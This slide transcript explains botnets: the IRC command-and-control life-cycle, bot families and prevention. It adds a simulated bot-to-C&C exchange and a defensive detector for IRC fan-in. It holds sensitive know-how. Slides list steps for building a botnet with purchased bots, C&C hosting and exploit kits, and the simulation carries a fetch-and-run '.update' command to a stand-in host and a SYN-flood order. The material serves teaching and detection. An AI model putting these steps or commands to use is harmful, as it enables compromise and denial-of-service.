
Topics to be covered


adonica




Presentation Transcript


  1. Topics to be covered 1. What are bots and botnets? 2. How does it work? 3. Types of botnets. 4. Prevention of botnets.

  2. What are bots and botnets? • Bot: a small program used to remotely control a computer. • Botnet: a network of zombies, i.e. compromised computers under the control of an attacker.

  3. How does it work?

  4. The following picture [1] shows the life-cycle of a botnet infection and the contact with the botmaster: • The infection strategies used by masters are the same ones seen in other malware, such as self-replicating worms and e-mail viruses, but a bot can also be spread by making the victim execute some form of malicious code on his machine. Many e-mail attachments are simply such executable files.

  5. The next step taken by a new bot is to contact a DNS server to resolve the DNS name of the IRC server (the IRC server's name is embedded in the executable, and a DNS query is made to obtain the server's IP address). This indirection lets the master retain control of the net even if the IP address associated with the IRC server's DNS name gets blacklisted: the name can simply be pointed at another host.


  7. IRC channels support several forms of communication as well as data dissemination, and many open-source server implementations are available, which makes the protocol well suited to botmasters. • Since the C&C channel is also specified in the binary, the bot can now establish an IRC connection with the server and join the given channel. Three authentication steps are involved: first, the bot authenticates itself to the server with the PASS message; then it must present a second password, set by the master (the channel key), in order to join the channel.

  8. Lastly, the botmaster also needs to authenticate himself to the bot before being able to send any command. The first two steps keep outsiders away from the C&C channel; the last one prevents the bots from being taken over by other masters.

  9. When the join has succeeded, the bot executes the channel's topic, which contains the default commands that every bot has to run. Often all bots on the channel can see every exchanged message, and this property is used in the source paper for the acquisition of insider information. Sometimes, however, broadcasting is disabled to prevent saturation.
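The exchange described in slides 5 to 9, modelled in Python as an added example (this is not code from the slides or from any real bot): a toy DNS table, a toy IRC server and a bot trade the messages of the life-cycle, including the three authentication steps (PASS to the server, a channel key on JOIN, and a master login before any command is obeyed), and the bot runs the channel topic as its default command. The host name, passwords, port and the command syntax (".login", ".update", ".ddos") are assumptions chosen for the example; the IRC numerics (464, 451, 475, 332) are the standard ones.

```python
# Added example: message-level model of an IRC C&C join. Not real bot code.

# Values a real bot carries hard-coded in its binary (assumed here).
CNC_HOSTNAME = "cnc.example.invalid"      # a name, resolved at run time
SERVER_PASS = "s3rver"                    # IRC PASS message
CHANNEL, CHANNEL_KEY = "#bots", "k3y"     # channel and its key (mode +k)
MASTER_PASSWORD = "m4ster"                # botmaster -> bot authentication
DEFAULT_TOPIC = ".update http://cnc.example.invalid/new.exe"


class ToyDNS:
    """The DNS step: the bot looks up a name, so the master can re-point it."""
    def __init__(self, records):
        self.records = dict(records)

    def resolve(self, name):
        return self.records[name]


class ToyIRCServer:
    """Just enough IRC to answer PASS, NICK/USER and JOIN with real numerics."""
    def __init__(self, server_pass, channel, key, topic):
        self.server_pass, self.channel = server_pass, channel
        self.key, self.topic = key, topic
        self.authed = set()      # nicks that sent the right PASS
        self.members = set()     # nicks that joined the channel

    def handle(self, nick, line):
        cmd, _, rest = line.partition(" ")
        if cmd == "PASS":
            if rest == self.server_pass:
                self.authed.add(nick)
                return []
            return [":srv 464 * :Password incorrect"]        # ERR_PASSWDMISMATCH
        if nick not in self.authed:
            return [":srv 451 * :You have not registered"]   # ERR_NOTREGISTERED
        if cmd in ("NICK", "USER"):
            return []
        if cmd == "JOIN":
            chan, _, key = rest.partition(" ")
            if chan != self.channel or key != self.key:
                return [f":srv 475 {nick} {chan} :Cannot join channel (+k)"]  # ERR_BADCHANNELKEY
            self.members.add(nick)
            return [f":{nick} JOIN {chan}",
                    f":srv 332 {nick} {chan} :{self.topic}"]  # RPL_TOPIC
        return [f":srv 421 {nick} {cmd} :Unknown command"]

    def broadcast(self, sender, text):
        """A channel PRIVMSG as every member sees it (everyone hears everything)."""
        return [f":{sender} PRIVMSG {self.channel} :{text}" for _ in self.members]


class Bot:
    def __init__(self, nick, dns, server):
        self.nick, self.dns, self.server = nick, dns, server
        self.master_authed = False
        self.executed = []       # commands the bot acted on
        self.log = []            # the exchange, for reading

    def execute(self, command):
        self.executed.append(command)  # a real bot would act here

    def send(self, line):
        replies = self.server.handle(self.nick, line)
        self.log += [f"> {line}"] + [f"< {r}" for r in replies]
        return replies

    def join_cnc(self):
        ip = self.dns.resolve(CNC_HOSTNAME)              # 1. DNS, not a fixed IP
        self.log.append(f"connect {ip}:6667")
        if self.send(f"PASS {SERVER_PASS}"):             # 2. server password
            return False                                 # 464 -> give up
        self.send(f"NICK {self.nick}")
        self.send(f"USER {self.nick} 0 * :{self.nick}")
        for reply in self.send(f"JOIN {CHANNEL} {CHANNEL_KEY}"):  # 3. channel key
            if " 332 " in reply:                         # topic = default command
                self.execute(reply.split(" :", 1)[1])
        return self.nick in self.server.members

    def on_privmsg(self, line):
        sender = line[1:].split(" ", 1)[0].split("!", 1)[0]
        text = line.split(" :", 1)[1]
        if text.startswith(".login "):                   # 4. master -> bot
            self.master_authed = text[len(".login "):] == MASTER_PASSWORD
        elif self.master_authed:
            self.execute(text)
        else:
            self.log.append(f"ignored from {sender}: {text}")


def scenario():
    """One bot joins; a rival fails to command it; the master logs in and succeeds."""
    dns = ToyDNS({CNC_HOSTNAME: "198.51.100.7"})
    srv = ToyIRCServer(SERVER_PASS, CHANNEL, CHANNEL_KEY, DEFAULT_TOPIC)
    bot = Bot("bot-0001", dns, srv)
    joined = bot.join_cnc()
    for text, who in [(".ddos syn 203.0.113.5", "rival"),
                      (f".login {MASTER_PASSWORD}", "master"),
                      (".ddos syn 203.0.113.5", "master")]:
        for line in srv.broadcast(who, text):
            bot.on_privmsg(line)
    return joined, bot.executed, bot.log


if __name__ == "__main__":
    ok, executed, log = scenario()
    print("\n".join(log))
    print("joined:", ok, "executed:", executed)
```

Running it prints the full exchange: the rival's ".ddos" is ignored because no ".login" preceded it, which is exactly the third authentication step protecting the bots from a takeover. Note that each step only holds as long as its secret is secret; the slides' later remark on Kaiten's weak authentication is the case where step three fails.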

  10. How to make a botnet? • Three things are required: • bot: a small program that can remotely perform certain functions.

  11. C&C server

  12. Network of zombies

  13. Step 1: Where to find a bot • Find a script on the Internet or purchase a ready-to-go bot. • Prices vary from $5 to $1000 depending on the bot's functionality. • Write one yourself.

  14. Step 2: C&C server • The C&C server is simply a powerful computer that gives the botmaster direct access to the zombies and, if needed, stores stolen data. For example, to install an IRC server:

  15. • A dedicated computer with the software installed (fairly legal). • Buy a domain, since it should be set up as a web server. • Hosting: to make the server reachable from the Internet, it should be hosted by a hosting company.

  16. Step 3: Creating zombies • Purchase or rent a network of zombies, or compromise computers yourself. • Use software packages such as Mpack, Icepack and WebAttacker, and your own ingenuity.

  17. Types of botnet • Agobot/Phatbot/Forbot/XtremBot: • This is probably the best-known bot. Currently, the AV vendor Sophos lists more than 500 known different versions of Agobot (Sophos virus analyses), and this number is steadily increasing. The bot itself is written in C++ with cross-platform capabilities, and the source code is under the GPL.

  18. mIRC-based bots - GT-Bots: • We subsume all mIRC-based bots under GT-bots, since there are so many different versions of them that it is hard to keep an overview of all the forks. mIRC itself is a popular IRC client for Windows. GT is an abbreviation for Global Threat, the common name used for all mIRC-scripted bots.

  19. Kaiten: • This bot has no spreader of its own and is written for Unix/Linux systems. Its weak user authentication makes it very easy to hijack a botnet running Kaiten. The bot itself consists of just one file.

  20. Q8 bots: • Q8bot is a very small bot, consisting of only 926 lines of C code, and it is notable for being written for Unix/Linux systems. It implements all the common features of a bot: dynamic updating via HTTP downloads, various DDoS attacks (e.g. SYN flood and UDP flood), execution of arbitrary commands, and more.

  21. Uses of botnets • Botnets are often used for Distributed Denial-of-Service (DDoS) attacks. A DDoS attack is an attack on a computer system or network that causes a loss of service to users, typically the loss of network connectivity and services, by consuming the bandwidth of the victim network.

  22. Sniffing traffic: • Bots can also use a packet sniffer to watch for interesting clear-text data passing by a compromised machine. The sniffers are mostly used to retrieve sensitive information such as usernames and passwords, but the sniffed data can contain other interesting information as well.

  23. Botnet prevention • Software defaults should be the most secure settings, not the least secure, and intrusion prevention systems should be deployed. • Implement spam filtering (with the CBL, the Composite Blocking List) and antivirus. • Implement an organizational firewall and content filtering. • Blackhole botnet controllers and phishing websites upon verification, and send regular notifications to downstream customers of detected issues. • Implement detection and filtering mechanisms where and when feasible.
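One concrete form the last item can take, as an added example that is not from the slides: a small detector run over constructed network-log lines, looking for the traces the life-cycle in slides 5 to 9 leaves on the wire. It flags a DNS name resolved by many internal hosts that then talk IRC, many internal hosts joining the same channel on the same server (the fan-in of a zombie network), and IRC on ports other than 6667/6697, since a bot's C&C server need not listen on the standard port. The log format, the 10.0.0.0/8 internal range, the addresses, the thresholds and the sample lines are assumptions for the example.

```python
# Added example: IRC C&C fan-in detector over constructed log lines.
import re
from collections import defaultdict

IRC_JOIN = re.compile(r"^JOIN\s+(#\S+)(?:\s+(\S+))?$")
INTERNAL = re.compile(r"^10\.")          # assumed internal range: 10.0.0.0/8
STANDARD_IRC_PORTS = {"6667", "6697"}

# Constructed log, one event per line: "<kind> <ts> <src> <dst> <detail>".
# For dns events dst is the resolver and detail the queried name; for irc
# events dst is server:port and detail the IRC command sent by src.
SAMPLE_LOG = """\
dns 1700000000 10.0.0.11 10.0.0.2 cnc.example.invalid
dns 1700000001 10.0.0.12 10.0.0.2 cnc.example.invalid
dns 1700000002 10.0.0.13 10.0.0.2 cnc.example.invalid
dns 1700000003 10.0.0.14 10.0.0.2 www.example.org
irc 1700000010 10.0.0.11 198.51.100.7:8080 PASS s3rver
irc 1700000011 10.0.0.11 198.51.100.7:8080 JOIN #bots k3y
irc 1700000012 10.0.0.12 198.51.100.7:8080 JOIN #bots k3y
irc 1700000013 10.0.0.13 198.51.100.7:8080 JOIN #bots k3y
irc 1700000014 10.0.0.14 203.0.113.9:6667 JOIN #linux
irc 1700000015 10.0.0.15 203.0.113.9:6667 JOIN #linux
"""


def parse(log_text):
    """Yield (kind, ts, src, dst, detail); silently skip malformed lines."""
    for raw in log_text.splitlines():
        parts = raw.split(None, 4)
        if len(parts) == 5:
            kind, ts, src, dst, detail = parts
            yield kind, int(ts), src, dst, detail


def analyze(log_text, min_hosts=3):
    """Return suspicious channels, names and non-standard IRC ports.

    min_hosts is the fan-in threshold: how many distinct internal hosts must
    share a channel (or a resolved name) before it is reported.
    """
    joiners = defaultdict(set)     # (server, channel) -> internal hosts
    resolvers = defaultdict(set)   # queried name -> internal hosts
    irc_hosts = set()              # internal hosts seen speaking IRC
    odd_ports = set()              # (server, port) for IRC off 6667/6697
    for kind, _ts, src, dst, detail in parse(log_text):
        if not INTERNAL.match(src):
            continue
        if kind == "dns":
            resolvers[detail].add(src)
        elif kind == "irc":
            irc_hosts.add(src)
            server, _, port = dst.rpartition(":")
            if port not in STANDARD_IRC_PORTS:
                odd_ports.add((server, port))
            m = IRC_JOIN.match(detail)
            if m:
                joiners[(server, m.group(1))].add(src)
    channels = {k: sorted(v) for k, v in joiners.items() if len(v) >= min_hosts}
    # A name counts only if the hosts that resolved it went on to speak IRC.
    names = {n: sorted(h & irc_hosts) for n, h in resolvers.items()
             if len(h & irc_hosts) >= min_hosts}
    return {"channels": channels, "names": names, "odd_ports": sorted(odd_ports)}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```

On the sample log the #bots channel on 198.51.100.7 is reported with three internal joiners, cnc.example.invalid is reported because the same three hosts resolved it and then spoke IRC, and 198.51.100.7:8080 is listed as IRC on a non-standard port; #linux with two joiners on a standard port stays below the threshold. The threshold is the tuning knob: legitimate IRC use in an organization produces small fan-in on a few well-known servers, so a low threshold on unknown servers is usually acceptable, and the verified hits are what the "blackhole botnet controllers" item above would then act on.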
